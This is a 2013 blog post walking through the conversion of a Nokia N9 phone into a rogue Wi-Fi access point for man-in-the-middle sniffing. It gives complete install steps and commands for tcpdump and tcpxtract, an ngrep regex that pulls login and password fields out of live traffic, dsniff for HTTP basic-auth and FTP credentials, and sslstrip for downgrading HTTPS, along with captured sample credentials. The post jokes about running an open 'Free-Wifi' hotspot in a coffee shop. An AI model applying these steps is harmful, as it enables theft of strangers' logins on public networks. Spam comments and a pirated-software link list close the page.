true-binary.com – code is poetry…

HOME

the n9 as an evil access point #mitm

01.02.2013 (1:22 am) – Filed under: computing, debian, linux, meego

Prelude: I used it in all these tools for development and privat use, e.g. you shouldn’t use it in a coffee-shop, call your hotspot “Free-Wifi” and turn the encryption off :P

The last month I looked for a way to use my n9 as package sniffer and I figured out some usefull stuff …

… my train of thought was – how can I sniff whatever it’s transmitted through my stock wifi-hotspot (joikuspot) …

… so here’s a guideline of what I got working and how it works:

mitm

My device:

Nokia n9, Linux RM 696 2.6.32.54-dfl-161-20121301 open mode, meego Harmattan PR1.3

Pre-dependencies:


I AM WORKING IN OPEN MODE, SO I DONT KNOW IF IT WORKS WITH THE STOCK KERNEL!!!


1. tcpdump + tcpxtract
2. ngrep
3. dsniff [dsniff itself]
4. ssldump?


1. tcpdump + tcpxtract:

tcpdump is a very powerful package analyzer – you can dump nearly all traffic with this tool …

tcpxtract is a tool to rebuild data from tcpdump-pcap files…

let’s install the packages [and dependencies]:

apt-get install tcpdump libpcap0.8

I took the tcpxtract_1.0.1-5_armel package out of the debian repository.

dpkg -i tcpxtract_1.0.1-5_armel.deb

now fire up the wifi hotspot, connect with a client and let the magic begin:

mkdir tcpxtract_out/
tcpdump -i wlan0 -n -s 1500 -w tcpdump_http.pcap port 80

# we are starting tcpdump on interface [-i] wlan0, set the snaplen to 1500 [-s], don’t convert addresses to names [-n] and listen only on port 80 [port 80]

open a website on the client … tcpdump will capture it.

when you think you are finished, kill tcpdump [crtl+c]

now we will convert the captured traffic:

/home/user/dev/tcpplay # tcpxtract -f tcpdump_http.pcap -o tcpxtract_out/

Found file of type “html” in session [82.150.199.80:20480 -> 192.168.20.20:25055], exporting to tcpxtract_out/00000000.html
Found file of type “png” in session [82.150.199.80:20480 -> 192.168.20.20:25055], exporting to tcpxtract_out/00000001.png
Found file of type “png” in session [82.150.199.80:20480 -> 192.168.20.20:25055], exporting to tcpxtract_out/00000002.png
Found file of type “png” in session [192.168.20.20:26079 -> 82.150.199.80:20480], exporting to tcpxtract_out/00000003.png

Found file of type “png” in session [92.122.212.57:20480 -> 192.168.20.20:30431], exporting to tcpxtract_out/00000021.png

it looks like this.

I LIKE! :)

2. ngrep

ngrep is a very powerful tool as well – you can analyze traffic live…

I’m going to show you how to filter the traffic by some regular expressions to look for logins:

first install the necessary dependencies and ngrep itself:

apt-get install lipcap0.8

here’s ngrep_1.45.ds2-9_armel [from debian repository]

dpkg -i ngrep ngrep_1.45.ds2-9_armel.deb

now fire up the wifi hotspot, connect with a client and let the magic begin [again ;) ]:

/home/user/dev/sniffer # ngrep ‘[&\s?](?:login|user(?:name|)|p(ass(?:word|wd|)|w|wd))[\s:=]\s?([^&\s]*)’ -q -i -d gprs0 port 80 or port 25 or port 110 -l
interface: gprs0 (123.123.123.123/255.255.255.255)
filter: (ip or ip6) and ( port 80 or port 25 or port 110 )
match: [&\s?](?:login|user(?:name|)|p(ass(?:word|wd|)|w|wd))[\s:=]\s?([^&\s]*)

T 123.123.123.123:61342 -> 82.150.199.80:80 [AP]
log=ohyes&pwd=itworks&wp-submit=Log+In&redirect_to=http%3A%2F%2Fwww.true-binary.com%2Fwp-admin%2F&testcookie=1

# we are starting ngrep with a regular expression filter, tell it to be quiet [-q], to ignore case [-i], to use interface gprs0 [-d] (i had segment faults when I started it on wlan0 … from time to time), -l to make the stdout line buffered [-l] (usefull when capturing to a file {2>&1 >ngrep.log}) and filter the traffic by ports [port 80 or port 25 or port 110]

… What it doesn’t do is capturing htaccess logins, I use dsniff for it.

3. dsniff

dsniff? – omg, it’s awesome! it includes:

arpspoof  – Send out unrequested (and possibly forged) arp replies.
dnsspoof  – forge replies to arbitrary DNS address / pointer queries on the Local Area Network.
dsniff    – password sniffer for several protocols.
filesnarf – saves selected files sniffed from NFS traffic.
macof     – flood the local network with random MAC addresses.
mailsnarf – sniffs mail on the LAN and stores it in mbox format.
msgsnarf  – record selected messages from different Instant Messengers.
sshmitm   – SSH monkey-in-the-middle. proxies and sniffs SSH traffic.
sshow     – SSH traffic analyser.
tcpkill   – kills specified in-progress TCP connections.
tcpnice   – slow down specified TCP connections via “active” traffic shaping.
urlsnarf  – output selected URLs sniffed from HTTP traffic in CLF.
webmitm   – HTTP / HTTPS monkey-in-the-middle. transparently proxies.
webspy    – sends URLs sniffed from a client to your local browser (requires libx11-6 installed).

dsniff does have some more dependencies than the other tools I described:

I took the libdb4.6_4.6.21-16_armel and libnids1.21_1.23-2_armel from the debian repository.

Here’s dsniff_2.4b1+debian-18_armel

apt-get install libnet1 libpcap0.8 libssl0.9.8 openssl

dpkg -i libdb4.6_4.6.21-16_armel.deb

dpkg -i libnids1.21_1.23-2_armel.deb

dpkg -i dsniff_2.4b1+debian-18_armel.deb

whooop! – should be working now :)

dsniff itself is very simple to use – it has a build-in filter. I used it to sniff the authentication for htaccess logins as well as ftp logins:

/home/user/dev/sniffer # dsniff -m -s 1500 -i gprs0
dsniff: listening on gprs0

—————–
01/31/13 10:45:02 tcp 123.123.123.123.61056 -> p111.111.111.111.some.isp.com.80 (http)
GET / HTTP/1.0
host: server.idonttellyou.com
authorization: Basic dGhpc2lzOmh0YWNjZXNzZHVtcA== [thisis:htaccessdump]

—————–
01/31/13 10:47:22 tcp 123.123.123.123.57838 -> 82.150.199.80.21 (ftp)
USER thisis
PASS ftpdump

# we are starting dsniff with automatic protocol detection [-m], set the snaplen to 1500 [-s] and listen on interface gprs0 [-i] … again I got segment faults when listening on wlan0.

4. sslstrip?

sslstrip strips down your https connections to http …

… I found a way to pipe your local connection through sslstrip, but not with the hotspot connected client.

All I did was to modify my APN connection – I activated the http_proxy on 127.0.0.1 and port 10000, and changed a gconf setting (gconftool-2 -t string -s /system/proxy/mode “manual”) – deactivate and activate the connection again and fire up sslstrip.

An alternative for testing is to set the http proxy in firefox.

What I figured out was: The Joikuspot doesn’t use the APN entry from the phone settings, because I tried to add a second APN with some changed settings and it won’t show up in the properties of Joikuspot. – Maybe that’s why it doesn’t take the proxy settings from the APN … anyway, I’m still working on a workaround!

Here’s sslstrip-0.9 (taken from http://www.thoughtcrime.org/)

/home/user/dev/sniffer/# apt-get install python-twisted-web

/home/user/dev/sniffer # tar xzf sslstrip-0.9.tar.gz && cd sslstrip-0.9

/home/user/dev/sniffer/sslstrip-0.9 # python setup.py build
running build
running build_py
running build_scripts
copying and adjusting sslstrip/sslstrip -> build/scripts-2.6
Cleaning up…

/home/user/dev/sniffer/sslstrip-0.9 # python setup.py install
running install
running build
running build_py
running build_scripts
copying and adjusting sslstrip/sslstrip -> build/scripts-2.6
running install_lib
running install_scripts
copying build/scripts-2.6/sslstrip -> /usr/local/bin
changing mode of /usr/local/bin/sslstrip to 755
running install_data
running install_egg_info
Removing /usr/local/lib/python2.6/dist-packages/sslstrip-0.9.egg-info
Writing /usr/local/lib/python2.6/dist-packages/sslstrip-0.9.egg-info
Cleaning up…

/home/user/dev/sniffer/sslstrip-0.9 # ln -s /usr/local/bin/sslstrip /usr/bin/

/home/user/dev/sniffer/sslstrip-0.9 # gconftool-2 -t string -s /system/proxy/mode “manual”

/home/user/dev/sniffer/sslstrip-0.9 # sslstrip -l 10000 -w ../sslstrip.log &

/home/user/dev/sniffer/sslstrip-0.9 # tail -f ../sslstrip.log

2013-01-31 23:57:56,683 SECURE POST Data (www.facebook.com):
lsd=AVpjTuuG&email=thisis%40just.an&pass=example&default_persistent=0&charset_test=%E2%82%AC%2C%C2%B4%2C%E2%82%AC%2C

… I also got the webmitm/mitmproxy running (fakes SSL-certifications, but as it’s not a very efficient and elegant way to work, so I won’t explain it)

cheers!

9 Responses to “the n9 as an evil access point #mitm”

  1. sds Says:

    when i type this code in terminal:

    tcpdump -i wlan0 -n -s 1500 -w tcpdump_http.pcap port 80

    said:

    sh: tcpdump: not found

    but in installing of tcpdump and libpcap0.8

    said:

    you have installed latest version of tcpdump and libpcap0.8 !!!

    Can u learn this post step by step,plzzzzzzzzzzzzzzzz?

  2. aviator ray ban sunglasses Says:

    Hmm is anyone else encountering problems with the images on this blog loading? I’m trying to find out if its a problem on my end or if it’s the blog. Any suggestions would be greatly appreciated.

  3. ??????? 574 Says:

    Hey! This is my 1st comment here so I just wanted to give a quick shout out and say I really enjoy reading your articles. Can you recommend any other blogs/websites/forums that go over the same subjects? Thank you!

  4. free delivery cheap nfl jerseys Says:

    With havin so much written content do you ever run into any problems of plagorism or copyright violation? My website has a lot of unique content I’ve either written myself or outsourced but it appears a lot of it is popping it up all over the web without my agreement. Do you know any ways to help protect against content from being ripped off? I’d really appreciate it.

  5. authentic nba jerseys for women Says:

    We stumbled over here different web address and thought I may as well check things out. I like what I see so i am just following you. Look forward to checking out your web page repeatedly.

  6. authentic nfl jerseys shop Says:

    This design is incredible! You definitely know how to keep a reader amused. Between your wit and your videos, I was almost moved to start my own blog (well, almost…HaHa!) Great job. I really loved what you had to say, and more than that, how you presented it. Too cool!

  7. authentic louis vuitton ladies sunglasses Says:

    Please let me know if you’re looking for a author for your blog. You have some really great posts and I feel I would be a good asset. If you ever want to take some of the load off, I’d love to write some articles for your blog in exchange for a link back to mine. Please send me an e-mail if interested. Cheers!

  8. devil's sea whip Says:

    Thhe disappearances of ships in the area involve the weaponization of gas
    deposits – whdn released, they can trigger the water below a ship to rush out momentarily, causing the keel to sink into the
    void just as the water begins rushing back in. The Deep Ones do this whenever a ship gets too close
    to obtaining out about them.

  9. ?????? Says:

    Oh my goodness! Amazing article dude! Thank you so much, However I
    am having troubles with your RSS. I don’t know why I cannot join it.
    Is there anybody getting similar RSS issues? Anybody who knows
    the solution can you kindly respond? Thanx!!

    ????????????????:??????

Leave a Comment
(All comments are moderated before they appear on the site.)


 
buy autodesk revit 2015 buy adobe after effects cc buy corel pdf fusion buy rosetta stone dutch buy autodesk autocad mechanical 2014 buy adobe dreamweaver cs5 buy microsoft onenote 2010 buy microsoft office 2013 professional buy adobe captivate 5 buy autodesk 3ds max 2013